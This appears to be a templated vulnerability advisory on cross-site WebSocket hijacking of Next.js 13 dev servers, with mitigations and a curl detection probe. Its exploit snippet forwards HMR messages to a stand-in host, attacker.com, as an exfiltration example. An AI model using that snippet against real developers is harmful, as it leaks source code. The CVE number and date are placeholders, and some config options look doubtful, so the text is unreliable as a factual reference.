Nextjs, Cross-site WebSocket Hijacking (CSWSH), CVE-2023-XXXX (Critical)

How the Vulnerability Works

This vulnerability affects Next.js development servers (`npm run dev`) by abusing an unprotected WebSocket endpoint. When `experimental.appDir` is enabled (versions 13.0.0 to 13.4), the WebSocket server does not validate the `Origin` header of the handshake. An attacker crafts a malicious webpage that opens a WebSocket connection to the victim's local Next.js dev server. Browsers do not apply Cross-Origin Resource Sharing (CORS) or same-origin restrictions to WebSocket handshakes, so with no server-side Origin check the attacker's page completes the handshake and hijacks the connection. Once connected, the attacker retrieves client-side component source code over the WebSocket, exposing sensitive application logic.

DailyCVE Form

Platform: Next.js
Version: 13.0.0 – 13.4
Vulnerability: CSWSH
Severity: Critical
Date: 2023-XX-XX

Prediction: Patch expected by Q1 2024

What Undercode Says:

Exploitation Analysis

1. Malicious WebSocket Handshake:

// A page on an attacker-controlled origin opens the HMR WebSocket; the dev server never checks the Origin header
const ws = new WebSocket('ws://localhost:3000/_next/webpack-hmr');
// Every HMR message (including served component source) is forwarded off-site
ws.onmessage = (e) => { fetch('https://attacker.com/leak', { method: 'POST', body: e.data }); };

2. Bypassing Origin Checks:

The WebSocket server accepts connections from any origin due to missing validation.

Mitigation Commands

1. Disable `experimental.appDir`:

// next.config.js
module.exports = { experimental: { appDir: false } };

2. Upgrade Next.js:

npm install next@latest

3. Network Isolation:

Restrict the local dev server to the loopback interface:
next dev --hostname 127.0.0.1

Note that this only keeps other hosts on the network from reaching the dev server; it does not by itself stop CSWSH, because the attacker's page runs inside the victim's own browser and connects to localhost from there.

Temporary Workarounds

  • Use a reverse proxy to enforce CORS (for a WebSocket handshake this means rejecting foreign `Origin` values; the `Access-Control-Allow-Origin` header alone does not block the upgrade, and the proxy must forward the Upgrade headers):
    location /_next/webpack-hmr {
    if ($http_origin != 'http://localhost:3000') { return 403; }
    add_header 'Access-Control-Allow-Origin' 'http://localhost:3000';
    proxy_http_version 1.1;
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";
    proxy_pass http://localhost:3000;
    }
    
  • Disable WebSocket HMR in development:
    // next.config.js
    module.exports = { devServer: { webSocketServer: false } };
    

Detection Script

curl -s -i --max-time 3 http://localhost:3000/_next/webpack-hmr -H 'Connection: Upgrade' -H 'Upgrade: websocket' -H 'Sec-WebSocket-Version: 13' -H 'Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==' \
  -H 'Origin: http://foreign-origin.example' | grep -i "101 Switching Protocols"

If the response includes `101 Switching Protocols` despite the foreign `Origin` header (a placeholder value here), the server accepted a cross-origin handshake and is vulnerable.

Expected Patch Fix

Next.js will likely enforce strict origin checks and disable WebSocket HMR by default in dev mode.

No additional notes.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
